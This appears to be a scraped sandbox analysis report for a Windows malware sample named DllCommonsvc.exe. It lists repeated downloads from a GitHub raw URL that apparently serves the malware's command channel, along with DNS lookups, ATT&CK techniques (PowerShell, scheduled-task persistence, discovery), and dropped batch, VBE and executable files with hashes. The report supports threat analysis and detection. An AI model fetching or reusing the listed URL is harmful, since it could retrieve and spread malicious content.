GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

DllCommonsvc.exe

896 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

DllCommonsvc.exe

849 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200

8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

71.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

71.159.190.20.in-addr.arpa
8.8.8.8:53

181.129.81.91.in-addr.arpa

dns

72 B
147 B
1
1

DNS Request

181.129.81.91.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

raw.githubusercontent.com

dns

DllCommonsvc.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.111.133

185.199.108.133

185.199.110.133

185.199.109.133
8.8.8.8:53

133.111.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.111.199.185.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

86.49.80.91.in-addr.arpa

dns

70 B
145 B
1
1

DNS Request

86.49.80.91.in-addr.arpa
8.8.8.8:53

81.144.22.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

81.144.22.2.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

174.117.168.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

174.117.168.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DllCommonsvc.exe.log

Filesize
1KB

MD5
7f3c0ae41f0d9ae10a8985a2c327b8fb

SHA1
d58622bf6b5071beacf3b35bb505bde2000983e3

SHA256
519fceae4d0dd4d09edd1b81bcdfa8aeab4b59eee77a4cd4b6295ce8e591a900

SHA512
8a8fd17eef071f86e672cba0d8fc2cfed6118aff816100b9d7c06eb96443c04c04bc5692259c8d7ecb1563e877921939c61726605af4f969e3f586f0913ed125

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Temp\2RP5SY0RjS.bat

Filesize
216B

MD5
476f74896cd297be3b6a3f389612b8b6

SHA1
4994ecbdcb7a7221340311ec913ece6ff19ad98b

SHA256
46c447fcc3c9272a6fe05e37717df0dac74743edf8b8b671a8c58b7931f14c21

SHA512
33367afae31a457de608b45f66f257071d20f32899e5c44307b6f68db7b81a55bce1e04d8b0121afb3054044baa418f6a8f33dff6a899d753fe94541050ea956

Download Submit
C:\Users\Admin\AppData\Local\Temp\4NR89d4K3E.bat

Filesize
216B

MD5
e9510c0c9cb5034ac242febe11a7c8f9

SHA1
cbd0faa19a9bf9bb5d5457ccbda1b0c04e5e7555

SHA256
2a59aa634dfc3996a7bc941428d551282525765aaa2533798651990bcf1791d9

SHA512
a95a63b4c12908eaaeb149c302b6aa2eab7894a8291c8c8d4ca4cf81b42d90403eb4dd5811cd0791cf40605f58230003531acf0b9b58dc58be863167b8f77307

Download Submit
C:\Users\Admin\AppData\Local\Temp\6Po3x2tXZG.bat

Filesize
216B

MD5
6a4244e47431064cfa7c8ee3160045b4

SHA1
8c08cf30160fc6e6d21ee1d659a09c1e5349729d

SHA256
af4c88161bfee4642b7f19b01c660c7036d757c53c20452ec635a8d3ae899f1d

SHA512
7226150aaeb5b619129215482f9b42cb4e428110e6e7f386f8025f21faee43941784db1b01dcf03363005e329ca5047db488ab7721359f2ee6c4d6e21cdfb9e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\8UyA8TRco5.bat

Filesize
216B

MD5
de46c06feb0b121790f47345c916e019

SHA1
803346cd1081f3ef30865e7537b3bc6e992751d9

SHA256
7cb73a4dfc14c84eb0a32cd82eac5f3dc4d9a28b9128bdd933e684e3b97f16c3

SHA512
e7f514118813f0f85993068300fed91c3ecc0cbf105e93ceb107323b42d6d782df7c10f4248d2e61d4644613c675c574e4a2c707945f7e5464e24413eb1045c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\GKRF07RVHS.bat

Filesize
216B

MD5
5d025fa07bfb1708363d4cfa8c4d3c44

SHA1
5deb57f8d11191bf70245b12cfa3ae2c4a6e7c30

SHA256
89d3d735eaebd16d6cfc50218acca4381cccf91836c03d7f53b49b677e019c78

SHA512
a30b145e72d3819f4b57fe22deb1dd6c6ff412b8d824848d371c6e2cf5d5805ce7f70aa0b5ada180d82a17aabb402ca038e25e4bbb8454a1f096ab380df4410e

Download Submit
C:\Users\Admin\AppData\Local\Temp\OI2OM6vZgr.bat

Filesize
216B

MD5
fb634ef02e2d12c7864cb7c17875d871

SHA1
5a4c1a4a6e47c31b8821c7e8956ea26cd3898997

SHA256
74822ea84703283ef6356eef0508fc6f78419c95e39bef310fa0e0e3e146e095

SHA512
d94785425ce0f44779b1b5ef49d023600883ae1100b817dd4d09e3e11f17ceaf856934cfbbae22bc966763eaaf9a2b661748bf31bc61e54b258bdf7bbcabe58c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iao0i5ku.gs2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dk6czFnjgV.bat

Filesize
216B

MD5
60aa3afdb716ea086acb4f0e1ad0c07f

SHA1
bb6608e729ede5699d7f4e3dd2814b5708287450

SHA256
a20628345ec538783e6155ef5f6b7371e4210afdd2e17d5d9adb1ff4d4826ed9

SHA512
72f247ea394d22406a24d993d16d44e02e70c6dc2ef4dbe730bd3793d9ef9e9a8501ccd8c03bcc04b53928c2f3519883d6d9cc433338165ee63f506ee5253d67

Download Submit
C:\Users\Admin\AppData\Local\Temp\grdey4A1QM.bat

Filesize
216B

MD5
33e2953be74eb4530d25c2b3618507aa

SHA1
96fabd45d430684d03bf398cb51fa460b831cb37

SHA256
08e737c30be006e9717427cb05acf2e32584a6ef509ed34edcf5958499c7e720

SHA512
26c87cc72767b852f0ae08a38fd399f4b634a36b2800733dfc725bdd25b7104518339559c8f584d35fbeeb6ca2bf42f657d9e27e3df0d4ddc8330fb4ceff6823

Download Submit
C:\Users\Admin\AppData\Local\Temp\lOqaIh1y4I.bat

Filesize
216B

MD5
33ccdeec4813ec157c0de19846825e0e

SHA1
8f8bf014322ad0e7dc0f57599b911cafcea9b0c3

SHA256
f60fc198f8b8d4a912c324a3de8e4aa9ca827bd87a171bd5dc1d814cbf8c49c2

SHA512
f56898daaa6c27f94a05a20d3fcfc675d45fe74b9fb308d1d6dd68876170dd738563b4af27dafc0f6d12375451ae9b18296820f2fb72cda3f4c2ac64bdc1c043

Download Submit
C:\Users\Admin\AppData\Local\Temp\oqEnL4f5pl.bat

Filesize
216B

MD5
64bad3f66dde3b91bf4ebf533c552233

SHA1
2b762bdcfea6a6f2f495ec1bf46de1a83598e73e

SHA256
6fdcc834c5be9d06173a417602a58c86bbb30b7dc2edb019a26a0bb30d339395

SHA512
a7806b24e32e0317e9091854fcc016f654e0e9d7b4dd7fff198e5e5995407237695a614b7c0793289cc4fcfaeaeb4443060f17a898163c68c54081b8f2a5fff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\pakqiPPahT.bat

Filesize
216B

MD5
9a7972ef0d9951d5b82c9c45a68404e8

SHA1
5ab58e81b0a5d049811599cdeef2ba4a6496c0a6

SHA256
3a9b8679245da53d61a3c7523871974b426003eccf6668a01d4c1ad26292a9fe

SHA512
0ccb21a304555592cf89324d6547c5384e2ed8a1599ddcf7cfa40cdf26b535ad0ee4f706fcc835ca1ed17f62852718f02ae5a6fe3ba33da8994ccbb91d2f81bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\tiHtiEmsSK.bat

Filesize
216B

MD5
7adb278f55cf98c3dd351b24075d6ca1

SHA1
ba2b9b4a2991cab259c1ff7ac93880d5d417d3d0

SHA256
da0e240b256825d5c700098d466dc0a6142d7dde8d9466afa094f340a1300501

SHA512
7c6abb29d233c5d3537bacea18815bdb0e9696c59552c47c198ffd9b363742542a0a7510bd1c9d1010a86c4f3d2a6ac267223798c98d04bd2a5f2d2f0289541f

Download Submit
C:\Users\Admin\AppData\Local\Temp\uZApDsIgYI.bat

Filesize
216B

MD5
8b27b60e9e441f4d2e284aef068d37ee

SHA1
57ce7a5a853fabd91b9ec69d997780fd052f4186

SHA256
497c41124c5b390a716dbf79bca5a2bb1e3388c76418132df07a12820193a735

SHA512
a6a73fb0835326e847504c3b757a6a00e229bc036310d04219f85b8d25d98848dce101f05629211d19f197e296a74b9535d353aa99084068782fccd42caa7dfc

Download Submit
C:\providercommon\1zu9dW.bat

Filesize
36B

MD5
6783c3ee07c7d151ceac57f1f9c8bed7

SHA1
17468f98f95bf504cc1f83c49e49a78526b3ea03

SHA256
8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

SHA512
c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

Download Submit
C:\providercommon\DllCommonsvc.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

Filesize
197B

MD5
8088241160261560a02c84025d107592

SHA1
083121f7027557570994c9fc211df61730455bb5

SHA256
2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

SHA512
20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

Download Submit
memory/396-159-0x0000000002270000-0x0000000002282000-memory.dmp

Filesize
72KB

Download
memory/864-32-0x00000258D5120000-0x00000258D5142000-memory.dmp

Filesize
136KB

Download
memory/1408-120-0x0000000002380000-0x0000000002392000-memory.dmp

Filesize
72KB

Download
memory/1424-191-0x00000000024F0000-0x0000000002502000-memory.dmp

Filesize
72KB

Download
memory/1832-109-0x000000001B560000-0x000000001B662000-memory.dmp

Filesize
1.0MB

Download
memory/1832-104-0x0000000002500000-0x0000000002512000-memory.dmp

Filesize
72KB

Download
memory/2584-118-0x000000001B730000-0x000000001B832000-memory.dmp

Filesize
1.0MB

Download
memory/2584-112-0x0000000002680000-0x0000000002692000-memory.dmp

Filesize
72KB

Download
memory/3448-184-0x0000000002BD0000-0x0000000002BE2000-memory.dmp

Filesize
72KB

Download
memory/3756-127-0x0000000000BF0000-0x0000000000C02000-memory.dmp

Filesize
72KB

Download
memory/4148-152-0x0000000002DD0000-0x0000000002DE2000-memory.dmp

Filesize
72KB

Download
memory/4836-17-0x0000000002660000-0x000000000266C000-memory.dmp

Filesize
48KB

Download
memory/4836-12-0x00007FFDEEC63000-0x00007FFDEEC65000-memory.dmp

Filesize
8KB

Download
memory/4836-13-0x0000000000200000-0x0000000000310000-memory.dmp

Filesize
1.1MB

Download
memory/4836-16-0x0000000002640000-0x000000000264C000-memory.dmp

Filesize
48KB

Download
memory/4836-14-0x0000000000AD0000-0x0000000000AE2000-memory.dmp

Filesize
72KB

Download
memory/4836-15-0x0000000002650000-0x000000000265C000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.